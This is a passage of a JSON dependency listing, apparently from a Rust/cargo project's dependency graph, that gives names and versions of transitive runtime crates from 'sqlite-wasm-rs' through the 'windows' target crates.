irements":"0.3.2","direct":false,"kind":"runtime","optional":false},{"id":25970003439,"package_name":"sqlite-wasm-rs","ecosystem":"cargo","requirements":"0.5.5","direct":false,"kind":"runtime","optional":false},{"id":25970003440,"package_name":"stable_deref_trait","ecosystem":"cargo","requirements":"1.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003441,"package_name":"stacker","ecosystem":"cargo","requirements":"0.1.15","direct":false,"kind":"runtime","optional":false},{"id":25970003442,"package_name":"static_assertions","ecosystem":"cargo","requirements":"1.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003443,"package_name":"strck","ecosystem":"cargo","requirements":"1.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970003444,"package_name":"string_enum","ecosystem":"cargo","requirements":"1.0.2","direct":false,"kind":"runtime","optional":false},{"id":25970003445,"package_name":"stringcase","ecosystem":"cargo","requirements":"0.4.0","direct":false,"kind":"runtime","optional":false},{"id":25970003446,"package_name":"strsim","ecosystem":"cargo","requirements":"0.11.1","direct":false,"kind":"runtime","optional":false},{"id":25970003447,"package_name":"strum","ecosystem":"cargo","requirements":"0.27.1","direct":false,"kind":"runtime","optional":false},{"id":25970003448,"package_name":"strum_macros","ecosystem":"cargo","requirements":"0.27.1","direct":false,"kind":"runtime","optional":false},{"id":25970003449,"package_name":"subtle","ecosystem":"cargo","requirements":"2.6.1","direct":false,"kind":"runtime","optional":false},{"id":25970003450,"package_name":"suffix_array","ecosystem":"cargo","requirements":"0.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970003451,"package_name":"swc_allocator","ecosystem":"cargo","requirements":"4.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970003452,"package_name":"swc_atoms","ecosystem":"cargo","requirements":"9.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970003453,"package_name":"swc_common","ecosystem":"cargo","requirements":"17.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970003454,"package_name":"swc_config","ecosystem":"cargo","requirements":"3.1.2","direct":false,"kind":"runtime","optional":false},{"id":25970003455,"package_name":"swc_config_macro","ecosystem":"cargo","requirements":"1.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970003456,"package_name":"swc_ecma_ast","ecosystem":"cargo","requirements":"18.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970003457,"package_name":"swc_ecma_codegen","ecosystem":"cargo","requirements":"20.0.2","direct":false,"kind":"runtime","optional":false},{"id":25970003458,"package_name":"swc_ecma_codegen_macros","ecosystem":"cargo","requirements":"2.0.2","direct":false,"kind":"runtime","optional":false},{"id":25970003459,"package_name":"swc_ecma_lexer","ecosystem":"cargo","requirements":"26.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970003460,"package_name":"swc_ecma_loader","ecosystem":"cargo","requirements":"17.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970003463,"package_name":"swc_ecma_parser","ecosystem":"cargo","requirements":"27.0.7","direct":false,"kind":"runtime","optional":false},{"id":25970003464,"package_name":"swc_ecma_transforms_base","ecosystem":"cargo","requirements":"30.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970003474,"package_name":"swc_ecma_transforms_classes","ecosystem":"cargo","requirements":"30.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970003475,"package_name":"swc_ecma_transforms_macros","ecosystem":"cargo","requirements":"1.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970003476,"package_name":"swc_ecma_transforms_proposal","ecosystem":"cargo","requirements":"30.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970003493,"package_name":"swc_ecma_transforms_react","ecosystem":"cargo","requirements":"33.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970003494,"package_name":"swc_ecma_transforms_typescript","ecosystem":"cargo","requirements":"33.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970003495,"package_name":"swc_ecma_utils","ecosystem":"cargo","requirements":"24.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970003496,"package_name":"swc_ecma_visit","ecosystem":"cargo","requirements":"18.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970003497,"package_name":"swc_eq_ignore_macros","ecosystem":"cargo","requirements":"1.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970003498,"package_name":"swc_macros_common","ecosystem":"cargo","requirements":"1.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970003499,"package_name":"swc_sourcemap","ecosystem":"cargo","requirements":"9.3.4","direct":false,"kind":"runtime","optional":false},{"id":25970003500,"package_name":"swc_ts_fast_strip","ecosystem":"cargo","requirements":"36.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970003502,"package_name":"swc_visit","ecosystem":"cargo","requirements":"2.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970003503,"package_name":"syn","ecosystem":"cargo","requirements":"1.0.109","direct":false,"kind":"runtime","optional":false},{"id":25970003504,"package_name":"syn","ecosystem":"cargo","requirements":"2.0.117","direct":false,"kind":"runtime","optional":false},{"id":25970003505,"package_name":"syn-match","ecosystem":"cargo","requirements":"0.3.1","direct":false,"kind":"runtime","optional":false},{"id":25970003506,"package_name":"sync_wrapper","ecosystem":"cargo","requirements":"1.0.2","direct":false,"kind":"runtime","optional":false},{"id":25970003507,"package_name":"synstructure","ecosystem":"cargo","requirements":"0.12.6","direct":false,"kind":"runtime","optional":false},{"id":25970003508,"package_name":"synstructure","ecosystem":"cargo","requirements":"0.13.1","direct":false,"kind":"runtime","optional":false},{"id":25970003509,"package_name":"sys_traits","ecosystem":"cargo","requirements":"0.1.28","direct":false,"kind":"runtime","optional":false},{"id":25970003511,"package_name":"sys_traits_macros","ecosystem":"cargo","requirements":"0.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003512,"package_name":"tagptr","ecosystem":"cargo","requirements":"0.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003513,"package_name":"tap","ecosystem":"cargo","requirements":"1.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970003514,"package_name":"tar","ecosystem":"cargo","requirements":"0.4.46","direct":false,"kind":"runtime","optional":false},{"id":25970003515,"package_name":"target-lexicon","ecosystem":"cargo","requirements":"0.13.2","direct":false,"kind":"runtime","optional":false},{"id":25970003516,"package_name":"target-triple","ecosystem":"cargo","requirements":"1.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970003517,"package_name":"tempfile","ecosystem":"cargo","requirements":"3.10.1","direct":false,"kind":"runtime","optional":false},{"id":25970003518,"package_name":"temporal_capi","ecosystem":"cargo","requirements":"0.2.3","direct":false,"kind":"runtime","optional":false},{"id":25970003519,"package_name":"temporal_rs","ecosystem":"cargo","requirements":"0.2.3","direct":false,"kind":"runtime","optional":false},{"id":25970003520,"package_name":"termcolor","ecosystem":"cargo","requirements":"1.4.1","direct":false,"kind":"runtime","optional":false},{"id":25970003521,"package_name":"terminal_size","ecosystem":"cargo","requirements":"0.4.1","direct":false,"kind":"runtime","optional":false},{"id":25970003522,"package_name":"testing_macros","ecosystem":"cargo","requirements":"1.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970003523,"package_name":"text-size","ecosystem":"cargo","requirements":"1.1.1","direct":false,"kind":"runtime","optional":false},{"id":25970003524,"package_name":"text_lines","ecosystem":"cargo","requirements":"0.6.0","direct":false,"kind":"runtime","optional":false},{"id":25970003525,"package_name":"thiserror","ecosystem":"cargo","requirements":"1.0.69","direct":false,"kind":"runtime","optional":false},{"id":25970003526,"package_name":"thiserror","ecosystem":"cargo","requirements":"2.0.12","direct":false,"kind":"runtime","optional":false},{"id":25970003527,"package_name":"thiserror-impl","ecosystem":"cargo","requirements":"1.0.69","direct":false,"kind":"runtime","optional":false},{"id":25970003528,"package_name":"thiserror-impl","ecosystem":"cargo","requirements":"2.0.12","direct":false,"kind":"runtime","optional":false},{"id":25970003529,"package_name":"thousands","ecosystem":"cargo","requirements":"0.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003530,"package_name":"thread_local","ecosystem":"cargo","requirements":"1.1.8","direct":false,"kind":"runtime","optional":false},{"id":25970003531,"package_name":"time","ecosystem":"cargo","requirements":"0.3.47","direct":false,"kind":"runtime","optional":false},{"id":25970003532,"package_name":"time-core","ecosystem":"cargo","requirements":"0.1.8","direct":false,"kind":"runtime","optional":false},{"id":25970003533,"package_name":"time-macros","ecosystem":"cargo","requirements":"0.2.27","direct":false,"kind":"runtime","optional":false},{"id":25970003534,"package_name":"timezone_provider","ecosystem":"cargo","requirements":"0.2.3","direct":false,"kind":"runtime","optional":false},{"id":25970003535,"package_name":"tiny-keccak","ecosystem":"cargo","requirements":"2.0.2","direct":false,"kind":"runtime","optional":false},{"id":25970003536,"package_name":"tiny_pretty","ecosystem":"cargo","requirements":"0.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003537,"package_name":"tinystr","ecosystem":"cargo","requirements":"0.7.6","direct":false,"kind":"runtime","optional":false},{"id":25970003538,"package_name":"tinystr","ecosystem":"cargo","requirements":"0.8.3","direct":false,"kind":"runtime","optional":false},{"id":25970003539,"package_name":"tinytemplate","ecosystem":"cargo","requirements":"1.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970003540,"package_name":"tinyvec","ecosystem":"cargo","requirements":"1.6.0","direct":false,"kind":"runtime","optional":false},{"id":25970003541,"package_name":"tinyvec_macros","ecosystem":"cargo","requirements":"0.1.1","direct":false,"kind":"runtime","optional":false},{"id":25970003542,"package_name":"tokio","ecosystem":"cargo","requirements":"1.47.1","direct":false,"kind":"runtime","optional":false},{"id":25970003543,"package_name":"tokio-eld","ecosystem":"cargo","requirements":"0.3.0","direct":false,"kind":"runtime","optional":false},{"id":25970003544,"package_name":"tokio-macros","ecosystem":"cargo","requirements":"2.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970003545,"package_name":"tokio-metrics","ecosystem":"cargo","requirements":"0.3.1","direct":false,"kind":"runtime","optional":false},{"id":25970003546,"package_name":"tokio-rustls","ecosystem":"cargo","requirements":"0.26.0","direct":false,"kind":"runtime","optional":false},{"id":25970003547,"package_name":"tokio-socks","ecosystem":"cargo","requirements":"0.5.3","direct":false,"kind":"runtime","optional":false},{"id":25970003548,"package_name":"tokio-stream","ecosystem":"cargo","requirements":"0.1.16","direct":false,"kind":"runtime","optional":false},{"id":25970003549,"package_name":"tokio-util","ecosystem":"cargo","requirements":"0.7.16","direct":false,"kind":"runtime","optional":false},{"id":25970003550,"package_name":"tokio-vsock","ecosystem":"cargo","requirements":"0.7.1","direct":false,"kind":"runtime","optional":false},{"id":25970003551,"package_name":"toml","ecosystem":"cargo","requirements":"0.5.11","direct":false,"kind":"runtime","optional":false},{"id":25970003552,"package_name":"toml","ecosystem":"cargo","requirements":"0.9.6","direct":false,"kind":"runtime","optional":false},{"id":25970003553,"package_name":"toml_datetime","ecosystem":"cargo","requirements":"0.7.5+spec-1.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003554,"package_name":"toml_edit","ecosystem":"cargo","requirements":"0.23.5","direct":false,"kind":"runtime","optional":false},{"id":25970003555,"package_name":"toml_parser","ecosystem":"cargo","requirements":"1.0.9+spec-1.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003556,"package_name":"toml_writer","ecosystem":"cargo","requirements":"1.0.6+spec-1.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003557,"package_name":"tonic","ecosystem":"cargo","requirements":"0.14.6","direct":false,"kind":"runtime","optional":false},{"id":25970003558,"package_name":"tonic-prost","ecosystem":"cargo","requirements":"0.14.6","direct":false,"kind":"runtime","optional":false},{"id":25970003559,"package_name":"tonic-types","ecosystem":"cargo","requirements":"0.14.6","direct":false,"kind":"runtime","optional":false},{"id":25970003560,"package_name":"tower","ecosystem":"cargo","requirements":"0.5.2","direct":false,"kind":"runtime","optional":false},{"id":25970003561,"package_name":"tower-layer","ecosystem":"cargo","requirements":"0.3.3","direct":false,"kind":"runtime","optional":false},{"id":25970003562,"package_name":"tower-service","ecosystem":"cargo","requirements":"0.3.3","direct":false,"kind":"runtime","optional":false},{"id":25970003563,"package_name":"tracing","ecosystem":"cargo","requirements":"0.1.44","direct":false,"kind":"runtime","optional":false},{"id":25970003564,"package_name":"tracing-attributes","ecosystem":"cargo","requirements":"0.1.31","direct":false,"kind":"runtime","optional":false},{"id":25970003565,"package_name":"tracing-core","ecosystem":"cargo","requirements":"0.1.36","direct":false,"kind":"runtime","optional":false},{"id":25970003566,"package_name":"tracing-log","ecosystem":"cargo","requirements":"0.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003567,"package_name":"tracing-opentelemetry","ecosystem":"cargo","requirements":"0.33.0","direct":false,"kind":"runtime","optional":false},{"id":25970003568,"package_name":"tracing-subscriber","ecosystem":"cargo","requirements":"0.3.23","direct":false,"kind":"runtime","optional":false},{"id":25970003569,"package_name":"triomphe","ecosystem":"cargo","requirements":"0.1.13","direct":false,"kind":"runtime","optional":false},{"id":25970003570,"package_name":"try-lock","ecosystem":"cargo","requirements":"0.2.5","direct":false,"kind":"runtime","optional":false},{"id":25970003571,"package_name":"trybuild","ecosystem":"cargo","requirements":"1.0.115","direct":false,"kind":"runtime","optional":false},{"id":25970003572,"package_name":"twox-hash","ecosystem":"cargo","requirements":"1.6.3","direct":false,"kind":"runtime","optional":false},{"id":25970003573,"package_name":"twox-hash","ecosystem":"cargo","requirements":"2.1.2","direct":false,"kind":"runtime","optional":false},{"id":25970003574,"package_name":"typed-arena","ecosystem":"cargo","requirements":"2.0.2","direct":false,"kind":"runtime","optional":false},{"id":25970003575,"package_name":"typeid","ecosystem":"cargo","requirements":"1.0.3","direct":false,"kind":"runtime","optional":false},{"id":25970003576,"package_name":"typenum","ecosystem":"cargo","requirements":"1.17.0","direct":false,"kind":"runtime","optional":false},{"id":25970003577,"package_name":"ucd-trie","ecosystem":"cargo","requirements":"0.1.6","direct":false,"kind":"runtime","optional":false},{"id":25970003578,"package_name":"unarray","ecosystem":"cargo","requirements":"0.1.4","direct":false,"kind":"runtime","optional":false},{"id":25970003579,"package_name":"unicase","ecosystem":"cargo","requirements":"2.7.0","direct":false,"kind":"runtime","optional":false},{"id":25970003580,"package_name":"unicode-general-category","ecosystem":"cargo","requirements":"1.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003581,"package_name":"unicode-id-start","ecosystem":"cargo","requirements":"1.4.0","direct":false,"kind":"runtime","optional":false},{"id":25970003582,"package_name":"unicode-ident","ecosystem":"cargo","requirements":"1.0.12","direct":false,"kind":"runtime","optional":false},{"id":25970003583,"package_name":"unicode-normalization","ecosystem":"cargo","requirements":"0.1.23","direct":false,"kind":"runtime","optional":false},{"id":25970003584,"package_name":"unicode-segmentation","ecosystem":"cargo","requirements":"1.11.0","direct":false,"kind":"runtime","optional":false},{"id":25970003585,"package_name":"unicode-width","ecosystem":"cargo","requirements":"0.1.13","direct":false,"kind":"runtime","optional":false},{"id":25970003586,"package_name":"unicode-width","ecosystem":"cargo","requirements":"0.2.2","direct":false,"kind":"runtime","optional":false},{"id":25970003587,"package_name":"unicode-xid","ecosystem":"cargo","requirements":"0.2.6","direct":false,"kind":"runtime","optional":false},{"id":25970003588,"package_name":"unicode_categories","ecosystem":"cargo","requirements":"0.1.1","direct":false,"kind":"runtime","optional":false},{"id":25970003589,"package_name":"unicycle","ecosystem":"cargo","requirements":"0.10.2","direct":false,"kind":"runtime","optional":false},{"id":25970003590,"package_name":"uniset","ecosystem":"cargo","requirements":"0.2.4","direct":false,"kind":"runtime","optional":false},{"id":25970003591,"package_name":"universal-hash","ecosystem":"cargo","requirements":"0.5.1","direct":false,"kind":"runtime","optional":false},{"id":25970003592,"package_name":"untrusted","ecosystem":"cargo","requirements":"0.7.1","direct":false,"kind":"runtime","optional":false},{"id":25970003593,"package_name":"untrusted","ecosystem":"cargo","requirements":"0.9.0","direct":false,"kind":"runtime","optional":false},{"id":25970003594,"package_name":"url","ecosystem":"cargo","requirements":"2.5.7","direct":false,"kind":"runtime","optional":false},{"id":25970003595,"package_name":"urlpattern","ecosystem":"cargo","requirements":"0.4.2","direct":false,"kind":"runtime","optional":false},{"id":25970003596,"package_name":"utf-8","ecosystem":"cargo","requirements":"0.7.6","direct":false,"kind":"runtime","optional":false},{"id":25970003597,"package_name":"utf16_iter","ecosystem":"cargo","requirements":"1.0.5","direct":false,"kind":"runtime","optional":false},{"id":25970003598,"package_name":"utf8-width","ecosystem":"cargo","requirements":"0.1.7","direct":false,"kind":"runtime","optional":false},{"id":25970003599,"package_name":"utf8_iter","ecosystem":"cargo","requirements":"1.0.4","direct":false,"kind":"runtime","optional":false},{"id":25970003600,"package_name":"utf8parse","ecosystem":"cargo","requirements":"0.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970003601,"package_name":"uuid","ecosystem":"cargo","requirements":"1.21.0","direct":false,"kind":"runtime","optional":false},{"id":25970003602,"package_name":"v8","ecosystem":"cargo","requirements":"150.4.0","direct":false,"kind":"runtime","optional":false},{"id":25970003603,"package_name":"v8_valueserializer","ecosystem":"cargo","requirements":"0.1.2","direct":false,"kind":"runtime","optional":false},{"id":25970003604,"package_name":"v8x","ecosystem":"cargo","requirements":"149.4.0-rc.4","direct":false,"kind":"runtime","optional":false},{"id":25970003605,"package_name":"valuable","ecosystem":"cargo","requirements":"0.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003606,"package_name":"vcpkg","ecosystem":"cargo","requirements":"0.2.15","direct":false,"kind":"runtime","optional":false},{"id":25970003607,"package_name":"version_check","ecosystem":"cargo","requirements":"0.9.4","direct":false,"kind":"runtime","optional":false},{"id":25970003608,"package_name":"vsimd","ecosystem":"cargo","requirements":"0.8.0","direct":false,"kind":"runtime","optional":false},{"id":25970003609,"package_name":"vsock","ecosystem":"cargo","requirements":"0.5.1","direct":false,"kind":"runtime","optional":false},{"id":25970003610,"package_name":"vte","ecosystem":"cargo","requirements":"0.13.1","direct":false,"kind":"runtime","optional":false},{"id":25970003611,"package_name":"vte_generate_state_changes","ecosystem":"cargo","requirements":"0.1.1","direct":false,"kind":"runtime","optional":false},{"id":25970003612,"package_name":"wait-timeout","ecosystem":"cargo","requirements":"0.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970003613,"package_name":"walkdir","ecosystem":"cargo","requirements":"2.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970003614,"package_name":"want","ecosystem":"cargo","requirements":"0.3.1","direct":false,"kind":"runtime","optional":false},{"id":25970003615,"package_name":"wasi","ecosystem":"cargo","requirements":"0.11.0+wasi-snapshot-preview1","direct":false,"kind":"runtime","optional":false},{"id":25970003616,"package_name":"wasi","ecosystem":"cargo","requirements":"0.14.2+wasi-0.2.4","direct":false,"kind":"runtime","optional":false},{"id":25970003617,"package_name":"wasip2","ecosystem":"cargo","requirements":"1.0.2+wasi-0.2.9","direct":false,"kind":"runtime","optional":false},{"id":25970003618,"package_name":"wasip3","ecosystem":"cargo","requirements":"0.4.0+wasi-0.3.0-rc-2026-01-06","direct":false,"kind":"runtime","optional":false},{"id":25970003619,"package_name":"wasite","ecosystem":"cargo","requirements":"0.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003620,"package_name":"wasm-bindgen","ecosystem":"cargo","requirements":"0.2.122","direct":false,"kind":"runtime","optional":false},{"id":25970003621,"package_name":"wasm-bindgen-futures","ecosystem":"cargo","requirements":"0.4.42","direct":false,"kind":"runtime","optional":false},{"id":25970003622,"package_name":"wasm-bindgen-macro","ecosystem":"cargo","requirements":"0.2.122","direct":false,"kind":"runtime","optional":false},{"id":25970003623,"package_name":"wasm-bindgen-macro-support","ecosystem":"cargo","requirements":"0.2.122","direct":false,"kind":"runtime","optional":false},{"id":25970003624,"package_name":"wasm-bindgen-shared","ecosystem":"cargo","requirements":"0.2.122","direct":false,"kind":"runtime","optional":false},{"id":25970003625,"package_name":"wasm-encoder","ecosystem":"cargo","requirements":"0.244.0","direct":false,"kind":"runtime","optional":false},{"id":25970003626,"package_name":"wasm-metadata","ecosystem":"cargo","requirements":"0.244.0","direct":false,"kind":"runtime","optional":false},{"id":25970003627,"package_name":"wasm-streams","ecosystem":"cargo","requirements":"0.4.0","direct":false,"kind":"runtime","optional":false},{"id":25970003628,"package_name":"wasm_dep_analyzer","ecosystem":"cargo","requirements":"0.4.0","direct":false,"kind":"runtime","optional":false},{"id":25970003629,"package_name":"wasmparser","ecosystem":"cargo","requirements":"0.244.0","direct":false,"kind":"runtime","optional":false},{"id":25970003630,"package_name":"wayland-sys","ecosystem":"cargo","requirements":"0.31.11","direct":false,"kind":"runtime","optional":false},{"id":25970003631,"package_name":"web-sys","ecosystem":"cargo","requirements":"0.3.99","direct":false,"kind":"runtime","optional":false},{"id":25970003632,"package_name":"web-time","ecosystem":"cargo","requirements":"1.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003633,"package_name":"web-transport-proto","ecosystem":"cargo","requirements":"0.2.7","direct":false,"kind":"runtime","optional":false},{"id":25970003634,"package_name":"webpki-root-certs","ecosystem":"cargo","requirements":"0.26.6","direct":false,"kind":"runtime","optional":false},{"id":25970003635,"package_name":"webpki-roots","ecosystem":"cargo","requirements":"0.26.1","direct":false,"kind":"runtime","optional":false},{"id":25970003636,"package_name":"weezl","ecosystem":"cargo","requirements":"0.1.8","direct":false,"kind":"runtime","optional":false},{"id":25970003637,"package_name":"wgpu-core","ecosystem":"cargo","requirements":"29.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970003638,"package_name":"wgpu-core-deps-apple","ecosystem":"cargo","requirements":"29.0.3","direct":false,"kind":"runtime","optional":false},{"id":25970003639,"package_name":"wgpu-core-deps-emscripten","ecosystem":"cargo","requirements":"29.0.3","direct":false,"kind":"runtime","optional":false},{"id":25970003640,"package_name":"wgpu-core-deps-windows-linux-android","ecosystem":"cargo","requirements":"29.0.3","direct":false,"kind":"runtime","optional":false},{"id":25970003641,"package_name":"wgpu-hal","ecosystem":"cargo","requirements":"29.0.3","direct":false,"kind":"runtime","optional":false},{"id":25970003642,"package_name":"wgpu-naga-bridge","ecosystem":"cargo","requirements":"29.0.3","direct":false,"kind":"runtime","optional":false},{"id":25970003643,"package_name":"wgpu-types","ecosystem":"cargo","requirements":"29.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970003644,"package_name":"which","ecosystem":"cargo","requirements":"6.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970003645,"package_name":"which","ecosystem":"cargo","requirements":"8.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970003646,"package_name":"whoami","ecosystem":"cargo","requirements":"1.6.0","direct":false,"kind":"runtime","optional":false},{"id":25970003647,"package_name":"wide","ecosystem":"cargo","requirements":"0.7.33","direct":false,"kind":"runtime","optional":false},{"id":25970003648,"package_name":"widestring","ecosystem":"cargo","requirements":"1.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003649,"package_name":"win32job","ecosystem":"cargo","requirements":"2.0.3","direct":false,"kind":"runtime","optional":false},{"id":25970003650,"package_name":"win_uds","ecosystem":"cargo","requirements":"0.2.2","direct":false,"kind":"runtime","optional":false},{"id":25970003651,"package_name":"winapi","ecosystem":"cargo","requirements":"0.3.9","direct":false,"kind":"runtime","optional":false},{"id":25970003652,"package_name":"winapi-i686-pc-windows-gnu","ecosystem":"cargo","requirements":"0.4.0","direct":false,"kind":"runtime","optional":false},{"id":25970003653,"package_name":"winapi-util","ecosystem":"cargo","requirements":"0.1.6","direct":false,"kind":"runtime","optional":false},{"id":25970003654,"package_name":"winapi-x86_64-pc-windows-gnu","ecosystem":"cargo","requirements":"0.4.0","direct":false,"kind":"runtime","optional":false},{"id":25970003655,"package_name":"windows","ecosystem":"cargo","requirements":"0.58.0","direct":false,"kind":"runtime","optional":false},{"id":25970003656,"package_name":"windows","ecosystem":"cargo","requirements":"0.61.3","direct":false,"kind":"runtime","optional":false},{"id":25970003657,"package_name":"windows","ecosystem":"cargo","requirements":"0.62.2","direct":false,"kind":"runtime","optional":false},{"id":25970003658,"package_name":"windows-collections","ecosystem":"cargo","requirements":"0.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003659,"package_name":"windows-collections","ecosystem":"cargo","requirements":"0.3.2","direct":false,"kind":"runtime","optional":false},{"id":25970003660,"package_name":"windows-core","ecosystem":"cargo","requirements":"0.58.0","direct":false,"kind":"runtime","optional":false},{"id":25970003661,"package_name":"windows-core","ecosystem":"cargo","requirements":"0.61.2","direct":false,"kind":"runtime","optional":false},{"id":25970003662,"package_name":"windows-core","ecosystem":"cargo","requirements":"0.62.2","direct":false,"kind":"runtime","optional":false},{"id":25970003663,"package_name":"windows-future","ecosystem":"cargo","requirements":"0.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970003664,"package_name":"windows-future","ecosystem":"cargo","requirements":"0.3.2","direct":false,"kind":"runtime","optional":false},{"id":25970003665,"package_name":"windows-implement","ecosystem":"cargo","requirements":"0.58.0","direct":false,"kind":"runtime","optional":false},{"id":25970003666,"package_name":"windows-implement","ecosystem":"cargo","requirements":"0.60.2","direct":false,"kind":"runtime","optional":false},{"id":25970003667,"package_name":"windows-interface","ecosystem":"cargo","requirements":"0.58.0","direct":false,"kind":"runtime","optional":false},{"id":25970003668,"package_name":"windows-interface","ecosystem":"cargo","requirements":"0.59.3","direct":false,"kind":"runtime","optional":false},{"id":25970003669,"package_name":"windows-link","ecosystem":"cargo","requirements":"0.1.3","direct":false,"kind":"runtime","optional":false},{"id":25970003670,"package_name":"windows-link","ecosystem":"cargo","requirements":"0.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970003671,"package_name":"windows-numerics","ecosystem":"cargo","requirements":"0.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003672,"package_name":"windows-numerics","ecosystem":"cargo","requirements":"0.3.1","direct":false,"kind":"runtime","optional":false},{"id":25970003673,"package_name":"windows-result","ecosystem":"cargo","requirements":"0.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003674,"package_name":"windows-result","ecosystem":"cargo","requirements":"0.3.4","direct":false,"kind":"runtime","optional":false},{"id":25970003675,"package_name":"windows-result","ecosystem":"cargo","requirements":"0.4.1","direct":false,"kind":"runtime","optional":false},{"id":25970003676,"package_name":"windows-strings","ecosystem":"cargo","requirements":"0.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003677,"package_name":"windows-strings","ecosystem":"cargo","requirements":"0.4.2","direct":false,"kind":"runtime","optional":false},{"id":25970003678,"package_name":"windows-strings","ecosystem":"cargo","requirements":"0.5.1","direct":false,"kind":"runtime","optional":false},{"id":25970003679,"package_name":"windows-sys","ecosystem":"cargo","requirements":"0.48.0","direct":false,"kind":"runtime","optional":false},{"id":25970003680,"package_name":"windows-sys","ecosystem":"cargo","requirements":"0.52.0","direct":false,"kind":"runtime","optional":false},{"id":25970003681,"package_name":"windows-sys","ecosystem":"cargo","requirements":"0.59.0","direct":false,"kind":"runtime","optional":false},{"id":25970003682,"package_name":"windows-sys","ecosystem":"cargo","requirements":"0.60.2","direct":false,"kind":"runtime","optional":false},{"id":25970003683,"package_name":"windows-sys","ecosystem":"cargo","requirements":"0.61.2","direct":false,"kind":"runtime","optional":false},{"id":25970003684,"package_name":"windows-targets","ecosystem":"cargo","requirements":"0.48.5","direct":false,"kind":"runtime","optional":false},{"id":25970003685,"package_name":"windows-targets","ecosystem":"cargo","requirements":"0.52.6","direct":false,"kind":"runtime","optional":false},{"id":25970003686,"package_name":"windows-targets","ecosystem":"cargo","requirements":"0.53.3","direct":false,"kind":"runtime","optional":false},{"id":25970003687,"package_name":"windows-threading","ecosystem":"cargo","requirements":"0.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003688,"package_name":"windows-threading","ecosystem":"cargo","requirements":"0.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970003689,"package_name":"windows_aarch64_gnullvm","ecosystem":"cargo","requirements":"0.48.5","direct":false,"kind":"runtime","optional":false},{"id":25970003690,"package_name":"windows_aarch64_gnullvm","ecosystem":"cargo","requirements":"0.52.6","direct":false,"kind":"runtime","optional":false},{"id":25970003691,"package_name":"windows_aarch64_gnullvm","ecosystem":"cargo","requirements":"0.53.0","direct":false,"kind":"runtime","optional":false},{"id":25970003692,"package_name":"windows_aarch64_msvc","ecosystem":"cargo","requirements":"0.48.5","direct":false,"kind":"runtime","optional":false},{"id":25970003693,"package_name":"windows_aarch64_msvc","ecosystem":"cargo","requirements":"0.52.6","direct":false,"kind":"runtime","optional":false},{"id":25970003694,"package_name":"windows_aarch64_msvc","ecosystem":"cargo","requirements":"0.53.0","direct":false,"kind":"runtime","optional":false},{"id":25970003695,"package_name":"windows_i686_gnu","ecosystem":"cargo","requirements":"0.48.5","direct":false,"kind":"runtime","optional":false},{"id":25970003696,"package_name":"windows_i686_gnu","ecosystem":"cargo","requirements":"0.52.6","direct":false,"kind":"runtime","optional":false},{"id":25970003697,"package_name":"windows_i686_gnu","ecosystem":"cargo","requirements":"0.53.0","direct":false,"kind":"runtime","optional":false},{"id":25970003698,"package_name":"windows_i686_gnullvm","ecosystem":"cargo","requirements":"0.52.6","direct":false,"kind":"runtime","optional":false},{"id":25970003699,"package_name":"windows_i686_gnullvm","ecosystem":"cargo","requirements":"0.53.0","direct":false,"kind":"runtime","optional":false},{"id":25970003700,"package_name":"windows_i686_msvc","ecosystem":"cargo","requirements":"0.48.5","direct":false,"kind":"runtime","optional":false},{"id":25970003701,"package_name":"windows_i686_msvc","ecosystem":"cargo","requirements":"0.52.6","direct":false,"kind":"runtime","optional":false},{"id":25970003702,"package_name":"windows_i686_msvc","ecosystem":"cargo","requirements":"0.53.0","direct":false,"kind":"runtime","optional":false},{"id":25970003703,"package_name":"windows_x86_64_gnu","ecosystem":"cargo","requirements":"0.48.5","direct":false,"kind":"runtime","optional":false},{"id":25970003704,"package_name":"windows_x86_64_gnu","ecosystem":"cargo",